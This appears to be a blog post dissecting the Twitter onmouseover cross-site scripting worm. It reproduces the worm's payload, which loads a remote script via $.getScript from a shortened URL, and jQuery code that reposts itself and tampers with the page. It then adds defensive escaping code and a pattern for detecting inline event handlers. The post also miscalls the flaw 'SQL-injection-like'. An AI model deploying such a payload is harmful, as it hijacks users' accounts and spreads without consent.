So it seems the new twitter.com has a “virus” going around.
A few minutes ago my Twitter stream filled up with strange jQuery calls, so I looked into it.
Apparently the new Twitter website is vulnerable to a simple SQL-injection-like attack.
It’ll just spit out to the page whatever HTML code you write on your status…
So, the exploit works like this:
User writes the following status line:
The onmouseover event fetches and executes remote JS code from
The remote script (which is not subject to size limits like the script embedded in the user’s status) can basically do whatever the hacker wants.
This one just manipulates the page’s HTML to submit a new tweet (the status line from step #1) and spread itself on:
    // put the self-replicating status line from step #1 into the tweet box and submit it
    $('#status').val("http://t.co/@\"style=\"font-size:999999999999px;\"\ onmouseover=\"$.getScript('http:\\u002f\\u002fis.gd\\u002ffl9A7')\"/");
    $('.status-update-form').submit();
    // tamper with the page UI, then post a second, harmless-looking tweet
    $('#status-field-char-counter').html("ekampf owns you!");
    $('#status').val('I read how to do this on DeveloperZen.com');
    $('.status-update-form').submit();
Besides submitting tweets, you can pretty much do whatever you want with the page’s UI, etc…
lots of fun…
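To make the root cause concrete, here is an added example (not code from the original post and not Twitter's own code) of a toy auto-linking step that turns a tweet into HTML. The names linkifyUnsafe, linkifySafe, escapeHtml and countInlineHandlers are my own; the status string is constructed to mirror the shape of the payload above but only calls alert(1) instead of loading a remote script. The unsafe version splices the URL straight into an href attribute, so a quote in the status ends the attribute and everything after it becomes new attributes; the hardened version escapes the value for its context first.

```javascript
// Escape the characters that can end a text node or an attribute value.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Toy URL matcher: anything starting with http(s):// up to the next whitespace.
const URL_RE = /https?:\/\/\S+/g;

// Unsafe: the matched URL is concatenated into the attribute and the link text.
// A double quote inside the URL terminates href and lets the rest of the status
// be parsed as further attributes (style=..., onmouseover=...).
function linkifyUnsafe(status) {
  return status.replace(URL_RE, (url) => `<a href="${url}">${url}</a>`);
}

// Hardened: every user-controlled value is HTML-escaped before it lands in
// markup, so quotes become &quot; and can no longer close the attribute.
function linkifySafe(status) {
  return status.replace(URL_RE, (url) => {
    const safe = escapeHtml(url);
    return `<a href="${safe}">${safe}</a>`;
  });
}

// Constructed status (assumption: shaped like the payload in the post, but inert).
const CONSTRUCTED_STATUS =
  'hello http://t.co/@"style="font-size:999999999999px;"onmouseover="alert(1)"/ world';

// Detection helper for rendered output: count inline event-handler attributes
// (on<something>=) that follow an attribute boundary. A renderer that never
// intends to emit handlers should always produce 0 for user content.
function countInlineHandlers(html) {
  const hits = html.match(/(?:^|[\s"'])on[a-z]+\s*=/gi);
  return hits ? hits.length : 0;
}

// Count raw double quotes in the rendered HTML; the safe renderer emits exactly
// the two that delimit href, since all user-supplied quotes were escaped.
function rawQuoteCount(html) {
  const hits = html.match(/"/g);
  return hits ? hits.length : 0;
}

// Stand-alone demonstration.
if (typeof require !== 'undefined' && require.main === module) {
  console.log('unsafe:', linkifyUnsafe(CONSTRUCTED_STATUS));
  console.log('safe  :', linkifySafe(CONSTRUCTED_STATUS));
  console.log('handlers unsafe/safe:',
    countInlineHandlers(linkifyUnsafe(CONSTRUCTED_STATUS)),
    countInlineHandlers(linkifySafe(CONSTRUCTED_STATUS)));
}
```

Escaping is the fix, but it is context-specific: the same value needs attribute escaping when placed in href and URL validation (scheme allowlist) if the link is ever followed; escaping alone does not make a javascript: URL safe to click.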